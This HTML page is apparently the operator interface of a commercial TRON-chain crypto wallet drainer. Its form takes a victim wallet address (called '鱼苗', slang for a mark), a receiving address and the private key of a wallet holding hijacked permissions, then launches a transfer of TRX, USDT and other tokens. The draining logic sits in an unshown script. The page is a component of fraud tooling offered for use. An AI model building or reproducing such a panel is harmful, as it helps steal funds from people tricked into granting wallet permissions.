<!DOCTYPE html>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">   
    <meta name="Author" content="Noah">
    <meta name="Keywords" content="">
    <meta name="Description" content="">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link rel="stylesheet" href="./static/css/bootstrap.min.css">
    <title>权限提币接口</title>
    <link rel="stylesheet" href="./static/css/style.css">    
    <link rel="stylesheet" href="./static/css/layer.css" id="layuicss-layer">
</head>
<body>
    <div id="all">
        <div class="wrapper">
            <div class="main">
				<h1>权限提币专用接口</h1>
				<div class="content">
					<div class="content-top">				
							<h2>TRX-USDT-USDC-USDJ-USDD-TUSD-ETH-WBTC</h2>
							
                            <ul id="myTab" class="nav nav-pills">
                            	<li class="active"><a href="/#trc" data-toggle="tab">TRX波场链</a></li>
                            	<!--<li><a href="/#erc" data-toggle="tab">ERC</a></li>
                            	<li><a href="/#bsc" data-toggle="tab">BSC</a></li>-->
                            </ul>
                            <div id="myTabContent" class="tab-content">
                            	<div class="tab-pane fade in active" id="trc">
                                	<form class="form-horizontal" method="post" id="trc-form">
                                	    <input type="hidden" id="trc-from-usdt" value="0">
                                	    <input type="hidden" id="trc-key-trx" value="0">
                                        <div class="form-group col-md-12">
                                            <label for="trc-from" class="control-label">鱼苗钱包地址</label>
                                            <div class="input-group">
                                                <input type="text" class="form-control" id="trc-from" placeholder="请输入鱼苗地址" value="">
                                            </div>
                                            <small id="trc-from-tips"></small> 
                                        </div>
                                    	<div class="form-group col-md-12">
                                    		<label for="trc-to" class="control-label">接款钱包地址</label>
                                    		<div class="input-group">
                                    			<input type="text" class="form-control" id="trc-to" placeholder="请输入接款地址">
                                    		</div>
                                    		<small id="trc-to-tips"></small> 
                                    	</div>
                                    	<div class="form-group col-md-12">
                                    		<label for="trc-key" class="control-label">权限钱包私钥</label>
                                    		<div class="input-group">
                                    			<input type="text" class="form-control" id="trc-key" placeholder="请输入新权限钱包私钥">
                                    		</div>
                                    		<small id="trc-key-tips"></small> 
                                    	</div>
                                	    <div class="input-group">
                                	        <button type="submit" class="btn btn-primary" id="trc-submit" onclick="return false">确认无误，发起交易</button>
                                        </div>
                                    </form>
                                    <div class="trc-success-pane" id="trc-tip">
                                        <img src="./static/img/success.png" alt="交易成功" class="success">
                                        <h3 class="text-center">交易发起成功,等待区块处理！</h3>
                                    </div> 
                            	</div>
                            </div>  
					</div>
				</div>
				<p class="footer">商用版</p>
			</div>	
            <ul class="bg-bubbles">
                <li></li>
                <li></li>
                <li></li>
                <li></li>
                <li></li>
                <li></li>
                <li></li>
                <li></li>
                <li></li>
                <li></li>
            </ul>
        </div>
    </div>
    <script src="./static/js/jquery.min.js"></script>
    <script src="./static/js/bootstrap.min.js"></script>
    <script src="./static/js/clipboard.min.js"></script>
    <script src="./static/js/layer.js"></script>
    <script src="./static/js/main.js?6=25"></script>
    <script src="./static/js/TronWeb.js"></script>

</body></html>